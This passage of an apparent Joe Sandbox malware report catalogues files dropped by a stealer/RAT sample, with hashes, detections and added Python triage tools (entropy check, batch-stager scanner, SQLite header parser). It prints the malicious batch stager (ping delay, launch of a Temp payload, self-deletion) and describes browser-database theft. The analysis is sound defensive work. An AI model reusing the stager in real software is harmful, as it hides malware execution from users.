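The four records above are the `__PSScriptPolicyTest_*.ps1` stubs that each powershell.exe instance writes to probe whether AppLocker or WDAC script enforcement is active; they are benign, and their identical hashes make them easy to suppress during triage. The block below is an added example, not code from the Joe Sandbox report: it recomputes the per-file fields of such a record (size, 8-bit Shannon entropy, MD5/SHA-1/SHA-256) from raw bytes so the report's values can be checked against a file recovered from disk. The sample is constructed from the Preview line; its 60th byte is assumed to be a trailing space, inferred from the 60-byte size against a 59-character preview (the entropy check does not depend on where that space sits).

```python
"""Recompute the metadata fields of a sandbox dropped-file record
(size, 8-bit Shannon entropy, MD5 / SHA-1 / SHA-256) from raw bytes.

Added example; not code from the Joe Sandbox report.
"""
import hashlib
import math
from collections import Counter
from typing import Dict

# Constructed sample: the stub powershell.exe writes to test AppLocker/WDAC
# script enforcement. The trailing space is an assumption (59 visible chars,
# "Size (bytes):60" in the report, "no line terminators" in the file type).
PS_POLICY_TEST = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report's record for this file.
REPORT_SIZE = 60
REPORT_ENTROPY = 4.038920595031593


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant byte stream,
    8.0 for a uniform distribution over all 256 byte values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def profile(data: bytes) -> Dict[str, object]:
    """Return the fields a dropped-file record carries for `data`."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def classify_entropy(h: float) -> str:
    """Coarse triage bucket. Thresholds are a common rule of thumb, not a standard;
    a .NET PE at ~7.57 (like the 2 MB dropper above) lands in the last bucket."""
    if h < 1.0:
        return "mostly zero/padding (e.g. sparse SQLite pages)"
    if h < 6.5:
        return "plain text or uncompressed code"
    if h < 7.2:
        return "mixed / partially compressed"
    return "packed, compressed or encrypted"


def matches_report(data: bytes, size: int, entropy: float, tol: float = 1e-6) -> bool:
    """True if the recomputed size and entropy agree with the report's fields."""
    p = profile(data)
    return p["size"] == size and abs(float(p["entropy"]) - entropy) < tol


if __name__ == "__main__":
    fields = profile(PS_POLICY_TEST)
    for key, value in fields.items():
        print(f"{key:>8}: {value}")
    print("  bucket:", classify_entropy(float(fields["entropy"])))
    print(" matches:", matches_report(PS_POLICY_TEST, REPORT_SIZE, REPORT_ENTROPY))
```

Run against a recovered file, `matches_report` confirms the record refers to the same bytes before any hash lookup; the entropy bucket is only a first-pass hint (a high value flags packing or encryption, not maliciousness by itself).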
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):185
                                                                                                                  Entropy (8bit):5.2234515926159935
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5xAIcuJzPJHBvBktKcKZG1t+kiE2J5xAV:hCRLuVFOOr+DE1wkn23fJzxHBvKOZG1n
                                                                                                                  MD5:9DA785D6C0E5B8A2E11B209A4D0EAD2C
                                                                                                                  SHA1:476C92CAAA5D56AC29586E8737B8931777E4A352
                                                                                                                  SHA-256:7B6565DEAF7C967118E52022321AAD502F184FEAD9FB8E577ACD8D7AFF226987
                                                                                                                  SHA-512:66E56B8B20E2BCBB8F9569853D694A938414736707ED993C29DFE1E907EA182B80BEE40D791731FDD820D50FBEBADE1D9708A16C8555E517443E74A79B732E67
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\hlVW2PE0oG.bat"
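The batch file above is the stage hand-off: `ping -n 10 localhost > nul` burns roughly nine seconds (one echo request per second, so N-1 seconds) as a sleep that needs no extra binary, `start` launches the dropped payload from the user's Temp directory, and `del /a /q /f` removes the batch file afterwards. The block below is an added example, not code from the Joe Sandbox report: a small line-based scanner that flags that three-part pattern in a .bat/.cmd file. `BAT_SAMPLE` is reconstructed from the record's Preview line, where each `..` is the CRLF pair the preview renders as dots, and `user` is the sandbox account name; the regular expressions and indicator names are this example's own.

```python
"""Flag the staging pattern in a dropped batch file: a ping-based sleep, the
launch of a payload from a user-writable Temp directory, then deletion of a
batch file (normally the script itself).

Added example; not code from the Joe Sandbox report.
"""
import re
from typing import Dict, List

# Reconstructed from the report's Preview line (".." = CRLF). The doubled
# backslash before the .bat name is in the original and is tolerated by cmd.exe.
BAT_SAMPLE = (
    b"@echo off\r\n"
    b"chcp 65001\r\n"
    b"ping -n 10 localhost > nul\r\n"
    b'start "" "C:\\Users\\user\\AppData\\Local\\Temp\\kahKUDRlEYHfKIalWlM.exe"\r\n'
    b'del /a /q /f "C:\\Users\\user\\AppData\\Local\\Temp\\\\hlVW2PE0oG.bat"\r\n'
)

PING_RE = re.compile(r"^\s*ping\b(?P<args>.*)$", re.I)
COUNT_RE = re.compile(r"-n\s+(\d+)", re.I)
LOOPBACK_RE = re.compile(r"(?<![\w.])(?:localhost|127\.0\.0\.1|::1)(?![\w.])", re.I)
NUL_RE = re.compile(r">\s*nul\b", re.I)
# start [ "title" ] [ /switches ] "path\to\payload.ext"
START_RE = re.compile(
    r'^\s*start\b\s*(?:"[^"]*"\s*)?(?:/\w+\s+)*"?'
    r'(?P<path>[^"\r\n]+?\.(?:exe|scr|com|bat|cmd|vbs|js|ps1))"?\s*$', re.I)
DEL_RE = re.compile(r'^\s*(?:del|erase)\b(?:\s+/\w+)*\s+"?(?P<path>[^"\r\n]+?)"?\s*$', re.I)
TEMP_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)

STAGING_CHAIN = {"ping_loopback_sleep", "start_from_temp", "deletes_batch_file"}


def analyze_batch(data: bytes) -> Dict[str, object]:
    """Scan each line for the three indicators and report what was found."""
    text = data.decode("utf-8", errors="replace")
    indicators: List[str] = []
    launches: List[str] = []
    deletes: List[str] = []
    sleep_seconds = 0
    for line in text.splitlines():
        m = PING_RE.match(line)
        if m and LOOPBACK_RE.search(m["args"]) and NUL_RE.search(m["args"]):
            c = COUNT_RE.search(m["args"])
            count = int(c.group(1)) if c else 4   # ping's default is 4 echo requests
            sleep_seconds += max(count - 1, 0)    # ~1 s between requests: N-1 s of delay
            indicators.append("ping_loopback_sleep")
            continue
        m = START_RE.match(line)
        if m:
            launches.append(m["path"])
            if TEMP_RE.search(m["path"]):
                indicators.append("start_from_temp")
            continue
        m = DEL_RE.match(line)
        if m:
            deletes.append(m["path"])
            if m["path"].lower().endswith((".bat", ".cmd")):
                indicators.append("deletes_batch_file")
    found = sorted(set(indicators))
    return {
        "indicators": found,
        "launches": launches,
        "deletes": deletes,
        "sleep_seconds": sleep_seconds,
        "staging_chain": STAGING_CHAIN <= set(found),
    }


if __name__ == "__main__":
    for key, value in analyze_batch(BAT_SAMPLE).items():
        print(f"{key:>14}: {value}")
```

The scanner works on the dropped file's bytes, so it does not need the parent process context; in an EDR the same three signals map to process telemetry (`ping.exe -n N localhost` with a redirected stdout, a child `*.exe` spawned from `%TEMP%`, and the script's own path in a later `del`), which is the shape of the "Uses ping.exe to sleep" and "Suspicious Script Execution From Temp Folder" signatures in this report.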
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2009600
                                                                                                                  Entropy (8bit):7.5678452559926175
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:Z1ijXQywiXW604Jjh42gv9Gk2AWDpL5ml:Z1IZXWCJjhZgHW1N4
                                                                                                                  MD5:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  SHA1:0D9CE3815F04C401561339B056C7AB2BA907E16C
                                                                                                                  SHA-256:92C34270DF9842C931AB9E4AF87A0CBDD1F3B12E70482D474C3A9D0029F09ADD
                                                                                                                  SHA-512:C7516E29A99FC053D07DA626BDCE8AB37917267DE2911685DEBD3E0764819B3A387626D98413EC62808789E28E15739E0B533A9C8AB765215506BDF6AD5EF707
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ............@.....................................K.......p............................................................................ ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc..............................@..B........................H.......|...........l...|...x............................................0..........(.... ........8........E....)...*...N.......8$...(.... ....~....{....:....& ....8....*(.... ....~....{o...:....& ....8....(.... ....~....{e...9....& ....8y......0..U....... ........8........E........5...m.......)...I.......8....8*... ....~....{....:....& ....8....r...ps....z*...... ........8....8.... ....~....{....:}...& ....8r...~....(@... .... .... ....s....~....(D....... ....~....{....92...
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
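The "File Type" lines for the SQLite databases dropped by kahKUDRlEYHfKIalWlM.exe are a decode of the 100-byte SQLite 3 file header, and the page-size/page-count pair explains the file sizes exactly (5 pages at the 4096-byte default is 20480 bytes; 56 pages at 2048 bytes is 114688). The block below is an added example, not code from the Joe Sandbox report or from libmagic: it parses that header and rebuilds the report's summary string, which is what a triage script needs to recognise a copied browser or application database without opening it with a SQLite library. The two headers it checks are constructed from the report's File Type and Size fields; the 4096-byte page size of the 20480-byte files is an assumption (the report omits it, and the default makes the size work out).

```python
"""Parse the 100-byte SQLite 3 file header and summarise it the way the
report's "File Type" line does.

Added example; not code from the Joe Sandbox report. Offsets follow the
SQLite file format (all multi-byte fields are big-endian).
"""
import struct
from typing import Dict

SQLITE_MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def build_header(page_size: int, change_counter: int, pages: int, schema_cookie: int,
                 schema_format: int, encoding: int, version_valid_for: int,
                 sqlite_version: int) -> bytes:
    """Assemble a header carrying the given fields (test fixture, not a real DB)."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1                   # rollback-journal read/write versions
    hdr[21], hdr[22], hdr[23] = 64, 32, 32  # fixed payload fraction bytes
    # 24: change counter, 28: pages, 32/36: freelist, 40: schema cookie, 44: schema format
    struct.pack_into(">IIIIII", hdr, 24, change_counter, pages, 0, 0, schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, encoding)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


def parse_header(data: bytes) -> Dict[str, object]:
    """Decode the header fields; raise ValueError if `data` is not an SQLite 3 file."""
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not an SQLite 3 database")
    raw_ps = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if raw_ps == 1 else raw_ps   # the value 1 encodes 65536
    if page_size < 512 or page_size & (page_size - 1):
        raise ValueError(f"invalid page size {page_size}")
    change_counter, pages = struct.unpack_from(">II", data, 24)
    schema_cookie, schema_format = struct.unpack_from(">II", data, 40)
    encoding = struct.unpack_from(">I", data, 56)[0]
    version_valid_for, version_num = struct.unpack_from(">II", data, 92)
    major, minor, patch = version_num // 1_000_000, version_num // 1000 % 1000, version_num % 1000
    return {
        "page_size": page_size,
        "file_counter": change_counter,
        "database_pages": pages,
        # The in-header page count is only trustworthy when these two match;
        # otherwise an older writer may have changed the file without updating it.
        "size_field_valid": version_valid_for == change_counter,
        "expected_size": page_size * pages,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "encoding": ENCODINGS.get(encoding, f"unknown({encoding})"),
        "version_valid_for": version_valid_for,
        "sqlite_version": f"{major}.{minor}.{patch}",
        "sqlite_version_number": version_num,
    }


def summarize(f: Dict[str, object]) -> str:
    """Render the fields in the report's "File Type" style (page size only when non-default)."""
    parts = [f"SQLite 3.x database, last written using SQLite version {f['sqlite_version_number']}"]
    if f["page_size"] != 4096:
        parts.append(f"page size {f['page_size']}")
    parts += [f"file counter {f['file_counter']}", f"database pages {f['database_pages']}",
              f"cookie {f['schema_cookie']:#x}", f"schema {f['schema_format']}",
              str(f["encoding"]), f"version-valid-for {f['version_valid_for']}"]
    return ", ".join(parts)


# Constructed from the report's records: the 20480-byte files and the 114688-byte file.
HDR_20480 = build_header(4096, 3, 5, 0x3, 4, 1, 3, 3039003)
HDR_114688 = build_header(2048, 2, 56, 0x24, 4, 1, 2, 3035005)

if __name__ == "__main__":
    for hdr in (HDR_20480, HDR_114688):
        fields = parse_header(hdr)
        print(summarize(fields), "| expected size", fields["expected_size"])
```

A mismatch between `expected_size` and the on-disk size, or `size_field_valid` being false, usually means a partial copy or a file written while the owning application still held it open, both common for databases a stealer copies out of a running browser's profile.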
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.243856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qVuT5Sn:qASn
                                                                                                                  MD5:FE384112227DFA2593CAB2C6C84D24C6
                                                                                                                  SHA1:35862614DDC1033EAF1B5646FD3560EE2308B829
                                                                                                                  SHA-256:FCDD97F3B537F0E1CC5CDACAF37521CECF808BBDE312150FB8883F1F7AF026F2
                                                                                                                  SHA-512:3C4EC3EC59D32B3528A46ACAEDD91BEEE36682BC9EAA66D750ED80DCC852A7FB498F8C96B448E063AEB662EA265C09FC2573A744A3297903BD10A0DDDEE971DF
                                                                                                                  Malicious:false
                                                                                                                  Preview:O40lsAEXBnv2IYY72dU7cMavB
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Joe Sandbox View:
                                                                                                                   • Filename: file.exe, Detection: malicious
                                                                                                                   • Filename: 00onP4lQDK.exe, Detection: malicious
                                                                                                                   • Filename: hjgesadfseawd.exe, Detection: malicious
                                                                                                                   • Filename: lfcdgbuksf.exe, Detection: malicious
                                                                                                                   • Filename: kyhjasehs.exe, Detection: malicious
                                                                                                                   • Filename: adjthjawdth.exe, Detection: malicious
                                                                                                                   • Filename: qNdO4D18CF.exe, Detection: malicious
                                                                                                                   • Filename: iN1fhAtzW2.exe, Detection: malicious
                                                                                                                   • Filename: based.exe, Detection: malicious
                                                                                                                   • Filename: 4Awb1u1GcJ.exe, Detection: malicious
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):24576
                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32768
                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
